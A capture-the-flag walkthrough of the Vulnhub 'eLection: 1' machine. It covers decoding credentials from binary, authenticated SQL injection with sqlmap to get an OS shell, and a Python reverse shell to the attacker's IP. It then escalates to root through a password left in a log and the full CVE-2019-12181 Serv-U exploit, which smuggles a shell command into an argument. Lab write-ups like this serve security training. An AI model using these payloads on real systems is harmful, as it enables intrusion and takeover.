Introduction

It is an OSCP-like VM, Medium Level difficulty.

This is eLection: 1 from Vulnhub.

Ports

SSH and HTTP only; simple.

HTTP

robots.txt has four disallowed entries:

  1. admin
  2. wordpress
  3. user, and
  4. election

1 through 3 actually don’t exist, but election does. It’s a Web Based Election System from tripath. Searchsploit says there’s an SQL injection, but it’s authenticated so we’d need some creds.

I run a gobuster:

root@kali:/opt/vulnhub/election# gobuster dir -u http://192.168.1.138/election/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -x js,txt,html,php

And it turns up some interesting things, including phpMyAdmin. But I ignore that and focus on card.php. It says:

00110000 00110001 00110001 00110001 00110000 00110001 etc etc

I take it to CyberChef and run it through from binary twice - we get some creds!

user:1234 pass:Zxc123!@#

These are credentials for http://192.168.1.138/election/admin and with that we can login, capture a certain request and run sqlmap.

The request:

POST /election/admin/ajax/op_kandidat.php HTTP/1.1
Host: 192.168.1.138
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 16
Origin: http://192.168.1.138
Connection: close
Referer: http://192.168.1.138/election/admin/kandidat.php?_
Cookie: el_listing_panitia=5; el_mass_adding=false; el_listing_siswa=5; PHPSESSID=b9a4bvmua02igmm5as9manmqs2; el_lang=en-us

aksi=fetch&id=76

And sqlmap:

root@kali:/opt/vulnhub/election# sqlmap -r getcandidate --level=5 --risk=3 --os-shell -p id

This commands gets an os shell through sqlmap. We can get a normal reverse shell with a second listener and our old friend pentestmonkey:

os-shell> python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.77",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We’re on the box.

www-data

So we’re on as www-data. I run linpeas, because I always do. This line catches my eye:

/var/www/html/election/admin/logs/system.log:[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123

We can su love. Or SSH in. Or both; whatever.

love

Love can’t run sudo. I search for SUID binaries:

love@election:/$ find / -perm -u=s -type f 2>/dev/null

And this line stands out:

/usr/local/Serv-U/Serv-U

What is Serv-U? I’ve never heard of it. Google leads me to this writeup of CVE-2019-12181, which is a privilege escalation for Serv-U FTP Server.

The exploit code is on github but it’s pretty simple:

/*
CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation 
vulnerability found by:
Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev
https://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.html
to compile and run:
gcc servu-pe-cve-2019-12181.c -o pe && ./pe
*/

#include <stdio.h>
#include <unistd.h>
#include <errno.h>

int main()
{       
    char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
    int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
    // if execv is successful, we won't reach here
    printf("ret val: %d errno: %d\n", ret_val, errno);
    return errno;
}

I compile it, run it and …. root.

love@election:/tmp$ ./pe
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(love)
opening root shell
# whoami
root
# cat root.txt
5238feefc4ffe09645d97e9ee49bc3a6

Cool.